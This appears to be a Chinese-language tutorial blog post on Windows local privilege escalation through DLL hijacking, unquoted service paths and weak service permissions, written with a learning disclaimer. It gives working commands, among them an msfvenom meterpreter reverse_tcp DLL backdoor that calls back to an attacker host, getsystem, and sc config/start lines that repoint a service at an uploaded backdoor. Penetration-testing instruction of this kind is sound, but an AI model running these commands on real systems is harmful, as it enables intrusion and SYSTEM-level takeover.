windows本地提权--dll劫持&不带引号的服务&不安全的服务

发布于:2024-04-25 ⋅ 阅读:(24) ⋅ 点赞:(0)

免责声明:本文仅做技术交流与学习...

目录

一.dll劫持

过程:

火绒剑检测:

ChkDllHijack检测:

检测出来有--->msf生成dll后门

二.不带引号服务 路径

1-找不带引号的服务

2-改名上传

3-监听后-->等待服务重启

4-getuid拿下

三.不安全的服务权限配合MSF

accesschk.exe检测:

JAWS检测:

命令执行:


本地--->system

一.dll劫持

dll劫持-CSDN博客

---自己生成一个dll文件,去覆盖程序原有的.把原有的dll文件替换掉,msf监听后,等待管理员的触发.


原理:Windows 程序启动的时候需要 DLL。如果这些 DLL 不存在,则可以通过在应用程 序要查找的位置放置恶意 DLL 来提权。

通常,Windows 应用程序有其预定义好的搜索DLL 的路径,它会根据下面的顺序进行搜索:

1、应用程序加载的目录(程序自身的目录)

2、C:\Windows\System32

3、C:\Windows\System

4、C:\Windows

5、当前工作目录Current Working Directory,CWD

6、在PATH环境变量的目录(先系统后用户)

过程:

信息收集-进程调试-制作dll并上传-替换dll-启动应用后成功.

火绒剑检测:

目标软件可以找版本相同的,进行调试.(通过测试)

只要靶机有目标软件,那就OK了.

查看进程,找到当前目录的dll目标文件.

ChkDllHijack检测:

https://github.com/anhkgg/anhkgg-tools

检测出来有--->msf生成dll后门

msfvenom -p windows/meterpreter/reverse_tcp Ihost=IP Iport=8888 -f dll -o kiko.dll

---名字改成人家原来的,上传,删除原有的(把之前的替换了)

--当人家再运行软件的时候,就会触发.

--MSF监听,--->上线.

getuid

getsystem


二.不带引号服务 路径

WIN提权 不带引号服务路径配合 MSF-Web_windows 服务未加引号-CSDN博客

Windows提权---DLL注入/不带引号的服务路径/注册表_dll注入提权-CSDN博客

GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation Framework

原理:即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有过多的权限,例如,可以直接修改它导致重定向执行文件。

路径的空格引号问题.        没有修改权限


                                        webshell,本地--->system

过程:检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功.

----就是对系统自带的"某些命令的利用",达到我们想做的事情.

1-找不带引号的服务

#查找命令:
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
 #排除windows的目录,去找其他目录下存在的.

---先让MSF上线--->将ps脚本上传上去.查找--->

--找到不带引号的服务.

2-改名上传

上传一个后门文件,修改成:

3-监听后-->等待服务重启

MSF监听...

等待管理员重启或服务器重启后触发.

4-getuid拿下

--->直接就是system权限了.

(因为运行的服务会调用system权限去运行.)


三.不安全的服务权限配合MSF

第62天-权限提升-烂土豆&dll 劫持&引号路径&服务权_第62天:权限提升-烂土豆&dll劫持&引号路径&服务权限-CSDN博客

原理:即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务拥有过多的权限,例如,可以直接修改它导致重定向执行文件。

服务权限问题.        可以修改权限对应的路径.

accesschk.exe检测:

AccessChk - Sysinternals | Microsoft Learn

#安装accesschk.exe后执行命令:
accesschk.exe -uwcqv "administrators" *

--重点关注服务都Access的.


JAWS检测:

https://github.com/411Hall/JAWS        --既能检测不安全问题,也能检测环境问题.

切换到powershell去运行...

到脚本目录下         ./文件         运行...


命令执行:

--上传后门到某目录下,监听,重启服务后成功拿下.

sc config "test" binpath="C:\1.exe"        执行命令更改路径指向.

sc start test                重启服务.


网站公告

今日签到

点亮在社区的每一天
去签到